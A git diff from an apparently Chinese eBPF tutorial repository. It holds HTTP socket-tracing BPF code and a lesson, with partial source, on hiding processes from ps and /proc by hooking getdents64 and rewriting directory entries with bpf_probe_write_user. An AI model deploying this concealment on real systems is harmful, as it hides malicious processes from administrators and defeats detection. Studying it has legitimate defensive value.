BPF gets upset if you do lots of + // size arithmetic. This makes it so that it's attributes followed by message. + struct attr_t { + // The timestamp when syscall completed (return probe was triggered). + uint64_t timestamp_ns; + + // Connection identifier (PID, FD, etc.). + struct conn_id_t conn_id; + + // The type of the actual data that the msg field encodes, which is used by the caller + // to determine how to interpret the data. + enum traffic_direction_t direction; + + // The size of the original message. 
We use this to truncate msg field to minimize the amount + // of data being transferred. + uint32_t msg_size; + + // A 0-based position number for this event on the connection, in terms of byte position. + // The position is for the first byte of this message. + uint64_t pos; + } attr; + char msg[MAX_MSG_SIZE]; +}; + +// Maps + +// A map of the active connections. The name of the map is conn_info_map +// the key is of type uint64_t, the value is of type struct conn_info_t, +// and the map won't be bigger than 128KB. +BPF_HASH(conn_info_map, uint64_t, struct conn_info_t, 131072); +// An helper map that will help us cache the input arguments of the accept syscall +// between the entry hook and the return hook. +BPF_HASH(active_accept_args_map, uint64_t, struct accept_args_t); +// Perf buffer to send to the user-mode the data events. +BPF_PERF_OUTPUT(socket_data_events); +// A perf buffer that allows us send events from kernel to user mode. +// This perf buffer is dedicated for special type of events - open events. +BPF_PERF_OUTPUT(socket_open_events); +// Perf buffer to send to the user-mode the close events. +BPF_PERF_OUTPUT(socket_close_events); +BPF_PERCPU_ARRAY(socket_data_event_buffer_heap, struct socket_data_event_t, 1); +BPF_HASH(active_write_args_map, uint64_t, struct data_args_t); +// Helper map to store read syscall arguments between entry and exit hooks. +BPF_HASH(active_read_args_map, uint64_t, struct data_args_t); +// An helper map to store close syscall arguments between entry and exit syscalls. +BPF_HASH(active_close_args_map, uint64_t, struct close_args_t); + +// Helper functions + +// Generates a unique identifier using a tgid (Thread Global ID) and a fd (File Descriptor). +static __inline uint64_t gen_tgid_fd(uint32_t tgid, int fd) { + return ((uint64_t)tgid << 32) | (uint32_t)fd; +} + +// An helper function that checks if the syscall finished successfully and if it did +// saves the new connection in a dedicated map of connections +static __inline void process_syscall_accept(struct pt_regs* ctx, uint64_t id, const struct accept_args_t* args) { + // Extracting the return code, and checking if it represent a failure, + // if it does, we abort the as we have nothing to do. + int ret_fd = PT_REGS_RC(ctx); + if (ret_fd <= 0) { + return; + } + + struct conn_info_t conn_info = {}; + uint32_t pid = id >> 32; + conn_info.conn_id.pid = pid; + conn_info.conn_id.fd = ret_fd; + conn_info.conn_id.tsid = bpf_ktime_get_ns(); + + uint64_t pid_fd = ((uint64_t)pid << 32) | (uint32_t)ret_fd; + // Saving the connection info in a global map, so in the other syscalls + // (read, write and close) we will be able to know that we have seen + // the connection + conn_info_map.update(&pid_fd, &conn_info); + + // Sending an open event to the user mode, to let the user mode know that we + // have identified a new connection. 
+ struct socket_open_event_t open_event = {}; + open_event.timestamp_ns = bpf_ktime_get_ns(); + open_event.conn_id = conn_info.conn_id; + bpf_probe_read(&open_event.addr, sizeof(open_event.addr), args->addr); + + socket_open_events.perf_submit(ctx, &open_event, sizeof(struct socket_open_event_t)); +} + +static inline __attribute__((__always_inline__)) void process_syscall_close(struct pt_regs* ctx, uint64_t id, + const struct close_args_t* close_args) { + int ret_val = PT_REGS_RC(ctx); + if (ret_val < 0) { + return; + } + + uint32_t tgid = id >> 32; + uint64_t tgid_fd = gen_tgid_fd(tgid, close_args->fd); + struct conn_info_t* conn_info = conn_info_map.lookup(&tgid_fd); + if (conn_info == NULL) { + // The FD being closed does not represent an IPv4 socket FD. + return; + } + + // Send to the user mode an event indicating the connection was closed. + struct socket_close_event_t close_event = {}; + close_event.timestamp_ns = bpf_ktime_get_ns(); + close_event.conn_id = conn_info->conn_id; + close_event.rd_bytes = conn_info->rd_bytes; + close_event.wr_bytes = conn_info->wr_bytes; + + socket_close_events.perf_submit(ctx, &close_event, sizeof(struct socket_close_event_t)); + + // Remove the connection from the mapping. + conn_info_map.delete(&tgid_fd); +} + +static inline __attribute__((__always_inline__)) bool is_http_connection(struct conn_info_t* conn_info, const char* buf, size_t count) { + // If the connection was already identified as HTTP connection, no need to re-check it. + if (conn_info->is_http) { + return true; + } + + // The minimum length of http request or response. + if (count < 16) { + return false; + } + + bool res = false; + if (buf[0] == 'H' && buf[1] == 'T' && buf[2] == 'T' && buf[3] == 'P') { + res = true; + } + if (buf[0] == 'G' && buf[1] == 'E' && buf[2] == 'T') { + res = true; + } + if (buf[0] == 'P' && buf[1] == 'O' && buf[2] == 'S' && buf[3] == 'T') { + res = true; + } + + if (res) { + conn_info->is_http = true; + } + + return res; +} + +static __inline void perf_submit_buf(struct pt_regs* ctx, const enum traffic_direction_t direction, + const char* buf, size_t buf_size, size_t offset, + struct conn_info_t* conn_info, + struct socket_data_event_t* event) { + switch (direction) { + case kEgress: + event->attr.pos = conn_info->wr_bytes + offset; + break; + case kIngress: + event->attr.pos = conn_info->rd_bytes + offset; + break; + } + + // Note that buf_size_minus_1 will be positive due to the if-statement above. + size_t buf_size_minus_1 = buf_size - 1; + + // Clang is too smart for us, and tries to remove some of the obvious hints we are leaving for the + // BPF verifier. So we add this NOP volatile statement, so clang can't optimize away some of our + // if-statements below. + // By telling clang that buf_size_minus_1 is both an input and output to some black box assembly + // code, clang has to discard any assumptions on what values this variable can take. + asm volatile("" : "+r"(buf_size_minus_1) :); + + buf_size = buf_size_minus_1 + 1; + + // 4.14 kernels reject bpf_probe_read with size that they may think is zero. + // Without the if statement, it somehow can't reason that the bpf_probe_read is non-zero. + size_t amount_copied = 0; + if (buf_size_minus_1 < MAX_MSG_SIZE) { + bpf_probe_read(&event->msg, buf_size, buf); + amount_copied = buf_size; + } else { + bpf_probe_read(&event->msg, MAX_MSG_SIZE, buf); + amount_copied = MAX_MSG_SIZE; + } + + // If-statement is redundant, but is required to keep the 4.14 verifier happy. 
+ if (amount_copied > 0) { + event->attr.msg_size = amount_copied; + socket_data_events.perf_submit(ctx, event, sizeof(event->attr) + amount_copied); + } +} + +static __inline void perf_submit_wrapper(struct pt_regs* ctx, + const enum traffic_direction_t direction, const char* buf, + const size_t buf_size, struct conn_info_t* conn_info, + struct socket_data_event_t* event) { + int bytes_sent = 0; + unsigned int i; +#pragma unroll + for (i = 0; i < CHUNK_LIMIT; ++i) { + const int bytes_remaining = buf_size - bytes_sent; + const size_t current_size = (bytes_remaining > MAX_MSG_SIZE && (i != CHUNK_LIMIT - 1)) ? MAX_MSG_SIZE : bytes_remaining; + perf_submit_buf(ctx, direction, buf + bytes_sent, current_size, bytes_sent, conn_info, event); + bytes_sent += current_size; + if (buf_size == bytes_sent) { + return; + } + } +} + +static inline __attribute__((__always_inline__)) void process_data(struct pt_regs* ctx, uint64_t id, + enum traffic_direction_t direction, + const struct data_args_t* args, ssize_t bytes_count) { + // Always check access to pointer before accessing them. + if (args->buf == NULL) { + return; + } + + // For read and write syscall, the return code is the number of bytes written or read, so zero means nothing + // was written or read, and negative means that the syscall failed. Anyhow, we have nothing to do with that syscall. + if (bytes_count <= 0) { + return; + } + + uint32_t pid = id >> 32; + uint64_t pid_fd = ((uint64_t)pid << 32) | (uint32_t)args->fd; + struct conn_info_t* conn_info = conn_info_map.lookup(&pid_fd); + if (conn_info == NULL) { + // The FD being read/written does not represent an IPv4 socket FD. + return; + } + + // Check if the connection is already HTTP, or check if that's a new connection, check protocol and return true if that's HTTP. + if (is_http_connection(conn_info, args->buf, bytes_count)) { + // allocate new event. + uint32_t kZero = 0; + struct socket_data_event_t* event = socket_data_event_buffer_heap.lookup(&kZero); + if (event == NULL) { + return; + } + + // Fill the metadata of the data event. + event->attr.timestamp_ns = bpf_ktime_get_ns(); + event->attr.direction = direction; + event->attr.conn_id = conn_info->conn_id; + + perf_submit_wrapper(ctx, direction, args->buf, bytes_count, conn_info, event); + } + + // Update the conn_info total written/read bytes. + switch (direction) { + case kEgress: + conn_info->wr_bytes += bytes_count; + break; + case kIngress: + conn_info->rd_bytes += bytes_count; + break; + } +} + +// Hooks +int syscall__probe_entry_accept(struct pt_regs* ctx, int sockfd, struct sockaddr* addr, socklen_t* addrlen) { + uint64_t id = bpf_get_current_pid_tgid(); + + // Keep the addr in a map to use during the exit method. + struct accept_args_t accept_args = {}; + accept_args.addr = (struct sockaddr_in *)addr; + active_accept_args_map.update(&id, &accept_args); + + return 0; +} + +int syscall__probe_ret_accept(struct pt_regs* ctx) { + uint64_t id = bpf_get_current_pid_tgid(); + + // Pulling the addr from the map. 
+ struct accept_args_t* accept_args = active_accept_args_map.lookup(&id); + if (accept_args != NULL) { + process_syscall_accept(ctx, id, accept_args); + } + + active_accept_args_map.delete(&id); + return 0; +} + + +// Hooking the entry of accept4 +// the signature of the syscall is int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen); +int syscall__probe_entry_accept4(struct pt_regs* ctx, int sockfd, struct sockaddr* addr, socklen_t* addrlen) { + // Getting a unique ID for the relevant thread in the relevant pid. + // That way we can link different calls from the same thread. + uint64_t id = bpf_get_current_pid_tgid(); + + // Keep the addr in a map to use during the accpet4 exit hook. + struct accept_args_t accept_args = {}; + accept_args.addr = (struct sockaddr_in *)addr; + active_accept_args_map.update(&id, &accept_args); + + return 0; +} + +// Hooking the exit of accept4 +int syscall__probe_ret_accept4(struct pt_regs* ctx) { + uint64_t id = bpf_get_current_pid_tgid(); + + // Pulling the addr from the map. + struct accept_args_t* accept_args = active_accept_args_map.lookup(&id); + // If the id exist in the map, we will get a non empty pointer that holds + // the input address argument from the entry of the syscall. + if (accept_args != NULL) { + process_syscall_accept(ctx, id, accept_args); + } + + // Anyway, in the end clean the map. + active_accept_args_map.delete(&id); + return 0; +} + +// original signature: ssize_t write(int fd, const void *buf, size_t count); +int syscall__probe_entry_write(struct pt_regs* ctx, int fd, char* buf, size_t count) { + uint64_t id = bpf_get_current_pid_tgid(); + + struct data_args_t write_args = {}; + write_args.fd = fd; + write_args.buf = buf; + active_write_args_map.update(&id, &write_args); + + return 0; +} + +int syscall__probe_ret_write(struct pt_regs* ctx) { + uint64_t id = bpf_get_current_pid_tgid(); + ssize_t bytes_count = PT_REGS_RC(ctx); // Also stands for return code. + + // Unstash arguments, and process syscall. + struct data_args_t* write_args = active_write_args_map.lookup(&id); + if (write_args != NULL) { + process_data(ctx, id, kEgress, write_args, bytes_count); + } + + active_write_args_map.delete(&id); + return 0; +} + +// original signature: ssize_t read(int fd, void *buf, size_t count); +int syscall__probe_entry_read(struct pt_regs* ctx, int fd, char* buf, size_t count) { + uint64_t id = bpf_get_current_pid_tgid(); + + // Stash arguments. + struct data_args_t read_args = {}; + read_args.fd = fd; + read_args.buf = buf; + active_read_args_map.update(&id, &read_args); + + return 0; +} + +int syscall__probe_ret_read(struct pt_regs* ctx) { + uint64_t id = bpf_get_current_pid_tgid(); + + // The return code the syscall is the number of bytes read as well. + ssize_t bytes_count = PT_REGS_RC(ctx); + struct data_args_t* read_args = active_read_args_map.lookup(&id); + if (read_args != NULL) { + // kIngress is an enum value that let's the process_data function + // to know whether the input buffer is incoming or outgoing. 
+ process_data(ctx, id, kIngress, read_args, bytes_count); + } + + active_read_args_map.delete(&id); + return 0; +} + +// original signature: int close(int fd) +int syscall__probe_entry_close(struct pt_regs* ctx, int fd) { + uint64_t id = bpf_get_current_pid_tgid(); + struct close_args_t close_args; + close_args.fd = fd; + active_close_args_map.update(&id, &close_args); + + return 0; +} + +int syscall__probe_ret_close(struct pt_regs* ctx) { + uint64_t id = bpf_get_current_pid_tgid(); + const struct close_args_t* close_args = active_close_args_map.lookup(&id); + if (close_args != NULL) { + process_syscall_close(ctx, id, close_args); + } + + active_close_args_map.delete(&id); + return 0; +} diff --git a/24-hide/.gitignore b/24-hide/.gitignore new file mode 100644 index 0000000..1841117 --- /dev/null +++ b/24-hide/.gitignore @@ -0,0 +1,10 @@ +.vscode +package.json +*.o +*.skel.json +*.skel.yaml +package.yaml +ecli +bootstrap +pidhide + diff --git a/24-hide/LICENSE b/24-hide/LICENSE new file mode 100644 index 0000000..47fc3a4 --- /dev/null +++ b/24-hide/LICENSE @@ -0,0 +1,29 @@ +BSD 3-Clause License + +Copyright (c) 2020, Andrii Nakryiko +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
diff --git a/24-hide/Makefile b/24-hide/Makefile new file mode 100644 index 0000000..7a64112 --- /dev/null +++ b/24-hide/Makefile @@ -0,0 +1,141 @@ +# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +OUTPUT := .output +CLANG ?= clang +LIBBPF_SRC := $(abspath ../../libbpf/src) +BPFTOOL_SRC := $(abspath ../../bpftool/src) +LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a) +BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool) +BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool +LIBBLAZESYM_SRC := $(abspath ../../blazesym/) +LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a) +LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h) +ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \ + | sed 's/arm.*/arm/' \ + | sed 's/aarch64/arm64/' \ + | sed 's/ppc64le/powerpc/' \ + | sed 's/mips.*/mips/' \ + | sed 's/riscv64/riscv/' \ + | sed 's/loongarch64/loongarch/') +VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h +# Use our own libbpf API headers and Linux UAPI headers distributed with +# libbpf to avoid dependency on system-wide headers, which could be missing or +# outdated +INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX)) +CFLAGS := -g -Wall +ALL_LDFLAGS := $(LDFLAGS) $(EXTRA_LDFLAGS) + +APPS = pidhide # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall + +CARGO ?= $(shell which cargo) +ifeq ($(strip $(CARGO)),) +BZS_APPS := +else +BZS_APPS := # profile +APPS += $(BZS_APPS) +# Required by libblazesym +ALL_LDFLAGS += -lrt -ldl -lpthread -lm +endif + +# Get Clang's default includes on this system. We'll explicitly add these dirs +# to the includes list when compiling with `-target bpf` because otherwise some +# architecture-specific dirs will be "missing" on some architectures/distros - +# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h, +# sys/cdefs.h etc. might be missing. +# +# Use '-idirafter': Don't interfere with include mechanics except where the +# build would have failed anyways. 
+CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \ + | sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') + +ifeq ($(V),1) + Q = + msg = +else + Q = @ + msg = @printf ' %-8s %s%s\n' \ + "$(1)" \ + "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \ + "$(if $(3), $(3))"; + MAKEFLAGS += --no-print-directory +endif + +define allow-override + $(if $(or $(findstring environment,$(origin $(1))),\ + $(findstring command line,$(origin $(1)))),,\ + $(eval $(1) = $(2))) +endef + +$(call allow-override,CC,$(CROSS_COMPILE)cc) +$(call allow-override,LD,$(CROSS_COMPILE)ld) + +.PHONY: all +all: $(APPS) + +.PHONY: clean +clean: + $(call msg,CLEAN) + $(Q)rm -rf $(OUTPUT) $(APPS) + +$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT): + $(call msg,MKDIR,$@) + $(Q)mkdir -p $@ + +# Build libbpf +$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf + $(call msg,LIB,$@) + $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \ + OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \ + INCLUDEDIR= LIBDIR= UAPIDIR= \ + install + +# Build bpftool +$(BPFTOOL): | $(BPFTOOL_OUTPUT) + $(call msg,BPFTOOL,$@) + $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap + + +$(LIBBLAZESYM_SRC)/target/release/libblazesym.a:: + $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release + +$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB, $@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@ + +$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB,$@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@ + +# Build BPF code +$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL) + $(call msg,BPF,$@) + $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \ + $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \ + -c $(filter %.c,$^) -o $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + +# Generate BPF skeletons +$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL) + $(call msg,GEN-SKEL,$@) + $(Q)$(BPFTOOL) gen skeleton $< > $@ + +# Build user-space code +$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h + +$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT) + $(call msg,CC,$@) + $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $(filter %.c,$^) -o $@ + +$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER) + +$(BZS_APPS): $(LIBBLAZESYM_OBJ) + +# Build application binary +$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) | $(OUTPUT) + $(call msg,BINARY,$@) + $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@ + +# delete failed targets +.DELETE_ON_ERROR: + +# keep intermediate (.skel.h, .bpf.o, etc) targets +.SECONDARY: diff --git a/24-hide/common.h b/24-hide/common.h new file mode 100644 index 0000000..ac4be7f --- /dev/null +++ b/24-hide/common.h @@ -0,0 +1,14 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_H +#define BAD_BPF_COMMON_H + +// Simple message structure to get events from eBPF Programs +// in the kernel to user spcae +#define TASK_COMM_LEN 16 +struct event { + int pid; + char comm[TASK_COMM_LEN]; + bool success; +}; + +#endif // BAD_BPF_COMMON_H diff --git a/24-hide/index.html b/24-hide/index.html new file mode 100644 index 0000000..e9d9667 --- /dev/null +++ b/24-hide/index.html @@ -0,0 +1,560 @@ + + + + + + 使用 eBPF 隐藏进程或文件信息 - bpf-developer-tutorial + + + + + + + + + + + + + + + + + + + + + + + + + + + 
+ +
    + + + + + + + + + + + + + + +
    + +
    + + + + + + + + +
    +
    +

    eBPF 开发实践:使用 eBPF 隐藏进程或文件信息

    +

    eBPF(扩展的伯克利数据包过滤器)是 Linux 内核中的一个强大功能,可以在无需更改内核源代码或重启内核的情况下,运行、加载和更新用户定义的代码。这种功能让 eBPF 在网络和系统性能分析、数据包过滤、安全策略等方面有了广泛的应用。

    +

    在本篇教程中,我们将展示如何利用 eBPF 来隐藏进程或文件信息,这是网络安全和防御领域中一种常见的技术。

    +

    背景知识与实现机制

    +

    "进程隐藏" 能让特定的进程对操作系统的常规检测机制变得不可见。在黑客攻击或系统防御的场景中,这种技术都可能被应用。具体来说,Linux 系统中每个进程都在 /proc/ 目录下有一个以其进程 ID 命名的子文件夹,包含了该进程的各种信息。ps 命令就是通过查找这些文件夹来显示进程信息的。因此,如果我们能隐藏某个进程的 /proc/ 文件夹,就能让这个进程对 ps 命令等检测手段“隐身”。

    +

    要实现进程隐藏,关键在于操作 /proc/ 目录。在 Linux 中,getdents64 系统调用可以读取目录下的文件信息。我们可以通过挂接这个系统调用,修改它返回的结果,从而达到隐藏文件的目的。实现这个功能需要使用到 eBPF 的 bpf_probe_write_user 功能,它可以修改用户空间的内存,因此能用来修改 getdents64 返回的结果。
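    为了直观理解这一点,可以先看看用户态程序(例如 ps、ls)通常是如何消费 getdents64 返回的缓冲区的:每条 linux_dirent64 记录都依靠 d_reclen 字段指向下一条记录,因此只要把目标前一条记录的 d_reclen 加大到足以“跨过”目标记录,遍历时目标就会被跳过。下面是一个简化的示意程序(省略了错误处理):

    #define _GNU_SOURCE
    #include <fcntl.h>
    #include <stdio.h>
    #include <sys/syscall.h>
    #include <unistd.h>

    // 与内核返回格式一致的目录项结构(简化声明)
    struct linux_dirent64 {
        unsigned long long d_ino;
        long long          d_off;
        unsigned short     d_reclen; // 本条记录的长度,决定下一条记录的位置
        unsigned char      d_type;
        char               d_name[];
    };

    int main(void)
    {
        char buf[4096];
        int fd = open("/proc", O_RDONLY | O_DIRECTORY);
        long nread = syscall(SYS_getdents64, fd, buf, sizeof(buf));

        for (long bpos = 0; bpos < nread;) {
            struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + bpos);
            printf("%s\n", d->d_name);
            bpos += d->d_reclen; // eBPF 程序篡改的正是这个字段
        }
        close(fd);
        return 0;
    }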

    +

    下面,我们会详细介绍如何在内核态和用户态编写 eBPF 程序来实现进程隐藏。

    +

    内核态 eBPF 程序实现

    +

    接下来,我们将详细介绍如何在内核态编写 eBPF 程序来实现进程隐藏。首先是 eBPF 程序的起始部分:

    +
    // SPDX-License-Identifier: BSD-3-Clause
    +#include "vmlinux.h"
    +#include <bpf/bpf_helpers.h>
    +#include <bpf/bpf_tracing.h>
    +#include <bpf/bpf_core_read.h>
    +#include "common.h"
    +
    +char LICENSE[] SEC("license") = "Dual BSD/GPL";
    +
    +// Ringbuffer Map to pass messages from kernel to user
    +struct {
    +    __uint(type, BPF_MAP_TYPE_RINGBUF);
    +    __uint(max_entries, 256 * 1024);
    +} rb SEC(".maps");
    +
    +// Map to fold the dents buffer addresses
    +struct {
    +    __uint(type, BPF_MAP_TYPE_HASH);
    +    __uint(max_entries, 8192);
    +    __type(key, size_t);
    +    __type(value, long unsigned int);
    +} map_buffs SEC(".maps");
    +
    +// Map used to enable searching through the
    +// data in a loop
    +struct {
    +    __uint(type, BPF_MAP_TYPE_HASH);
    +    __uint(max_entries, 8192);
    +    __type(key, size_t);
    +    __type(value, int);
    +} map_bytes_read SEC(".maps");
    +
    +// Map with address of actual
    +struct {
    +    __uint(type, BPF_MAP_TYPE_HASH);
    +    __uint(max_entries, 8192);
    +    __type(key, size_t);
    +    __type(value, long unsigned int);
    +} map_to_patch SEC(".maps");
    +
    +// Map to hold program tail calls
    +struct {
    +    __uint(type, BPF_MAP_TYPE_PROG_ARRAY);
    +    __uint(max_entries, 5);
    +    __type(key, __u32);
    +    __type(value, __u32);
    +} map_prog_array SEC(".maps");
    +
    +

    我们首先需要理解这个 eBPF 程序的基本构成和使用到的几个重要组件。前几行引用了几个重要的头文件,如 "vmlinux.h"、"bpf_helpers.h"、"bpf_tracing.h" 和 "bpf_core_read.h"。这些文件提供了 eBPF 编程所需的基础设施和一些重要的函数或宏。

    +
      +
    • "vmlinux.h" 是一个包含了完整的内核数据结构的头文件,是从 vmlinux 内核二进制中提取的。使用这个头文件,eBPF 程序可以访问内核的数据结构。
    • +
    • "bpf_helpers.h" 头文件中定义了一系列的宏,这些宏是 eBPF 程序使用的 BPF 助手(helper)函数的封装。这些 BPF 助手函数是 eBPF 程序和内核交互的主要方式。
    • +
    • "bpf_tracing.h" 是用于跟踪事件的头文件,它包含了许多宏和函数,这些都是为了简化 eBPF 程序对跟踪点(tracepoint)的操作。
    • +
    • "bpf_core_read.h" 头文件提供了一组用于从内核读取数据的宏和函数。
    • +
    +

    程序中定义了一系列的 map 结构,这些 map 是 eBPF 程序中的主要数据结构,它们用于在内核态和用户态之间共享数据,或者在 eBPF 程序中存储和传递数据。

    +

    其中,"rb" 是一个 Ringbuffer 类型的 map,它用于从内核向用户态传递消息。Ringbuffer 是一种能在内核和用户态之间高效传递大量数据的数据结构。

    +

    "map_buffs" 是一个 Hash 类型的 map,它用于存储目录项(dentry)的缓冲区地址。

    +

    "map_bytes_read" 是另一个 Hash 类型的 map,它用于在数据循环中启用搜索。

    +

    "map_to_patch" 是另一个 Hash 类型的 map,存储了需要被修改的目录项(dentry)的地址。

    +

    "map_prog_array" 是一个 Prog Array 类型的 map,它用于保存程序的尾部调用。

    +

    程序中的 "target_ppid" 和 "pid_to_hide_len"、"pid_to_hide" 是几个重要的全局变量,它们分别存储了目标父进程的 PID、需要隐藏的 PID 的长度以及需要隐藏的 PID。

    +

    接下来的代码部分,程序定义了一个名为 "linux_dirent64" 的结构体,这个结构体代表一个 Linux 目录项。然后程序定义了两个函数,"handle_getdents_enter" 和 "handle_getdents_exit",这两个函数分别在 getdents64 系统调用的入口和出口被调用,用于实现对目录项的操作。

    +
    
    +// Optional Target Parent PID
    +const volatile int target_ppid = 0;
    +
    +// These store the string represenation
    +// of the PID to hide. This becomes the name
    +// of the folder in /proc/
    +const volatile int pid_to_hide_len = 0;
    +const volatile char pid_to_hide[max_pid_len];
    +
    +// struct linux_dirent64 {
    +//     u64        d_ino;    /* 64-bit inode number */
    +//     u64        d_off;    /* 64-bit offset to next structure */
    +//     unsigned short d_reclen; /* Size of this dirent */
    +//     unsigned char  d_type;   /* File type */
    +//     char           d_name[]; /* Filename (null-terminated) */ }; 
    +// int getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);
    +SEC("tp/syscalls/sys_enter_getdents64")
    +int handle_getdents_enter(struct trace_event_raw_sys_enter *ctx)
    +{
    +    size_t pid_tgid = bpf_get_current_pid_tgid();
    +    // Check if we're a process thread of interest
    +    // if target_ppid is 0 then we target all pids
    +    if (target_ppid != 0) {
    +        struct task_struct *task = (struct task_struct *)bpf_get_current_task();
    +        int ppid = BPF_CORE_READ(task, real_parent, tgid);
    +        if (ppid != target_ppid) {
    +            return 0;
    +        }
    +    }
    +    int pid = pid_tgid >> 32;
    +    unsigned int fd = ctx->args[0];
    +    unsigned int buff_count = ctx->args[2];
    +
    +    // Store params in map for exit function
    +    struct linux_dirent64 *dirp = (struct linux_dirent64 *)ctx->args[1];
    +    bpf_map_update_elem(&map_buffs, &pid_tgid, &dirp, BPF_ANY);
    +
    +    return 0;
    +}
    +
    +

    在这部分代码中,我们可以看到 eBPF 程序的一部分具体实现,该程序负责在 getdents64 系统调用的入口处进行处理。

    +

    我们首先声明了几个全局的变量。其中 target_ppid 代表我们要关注的目标父进程的 PID。如果这个值为 0,那么我们将关注所有的进程。pid_to_hide_lenpid_to_hide 则分别用来存储我们要隐藏的进程的 PID 的长度和 PID 本身。这个 PID 会转化成 /proc/ 目录下的一个文件夹的名称,因此被隐藏的进程在 /proc/ 目录下将无法被看到。

    +

    接下来,我们声明了一个名为 linux_dirent64 的结构体。这个结构体代表一个 Linux 目录项,包含了一些元数据,如 inode 号、下一个目录项的偏移、当前目录项的长度、文件类型以及文件名。

    +

    然后是 getdents64 函数的原型。这个函数是 Linux 系统调用,用于读取一个目录的内容。我们的目标就是在这个函数执行的过程中,对目录项进行修改,以实现进程隐藏。

    +

    随后的部分是 eBPF 程序的具体实现。我们在 getdents64 系统调用的入口处定义了一个名为 handle_getdents_enter 的函数。这个函数首先获取了当前进程的 PID 和线程组 ID,然后检查这个进程是否是我们关注的进程。如果我们设置了 target_ppid,那么我们就只关注那些父进程的 PID 为 target_ppid 的进程。如果 target_ppid 为 0,我们就关注所有进程。

    +

    在确认了当前进程是我们关注的进程之后,我们将 getdents64 系统调用的参数保存到一个 map 中,以便在系统调用返回时使用。我们特别关注 getdents64 系统调用的第二个参数,它是一个指向 linux_dirent64 结构体的指针,代表了系统调用要读取的目录的内容。我们将这个指针以及当前的 PID 和线程组 ID 作为键值对保存到 map_buffs 这个 map 中。

    +

    至此,我们完成了 getdents64 系统调用入口处的处理。在系统调用返回时,我们将会在 handle_getdents_exit 函数中,对目录项进行修改,以实现进程隐藏。

    +

    在接下来的代码段中,我们将要实现在 getdents64 系统调用返回时的处理。我们主要的目标就是找到我们想要隐藏的进程,并且对目录项进行修改以实现隐藏。

    +

    我们首先定义了一个名为 handle_getdents_exit 的函数,它将在 getdents64 系统调用返回时被调用。

    +
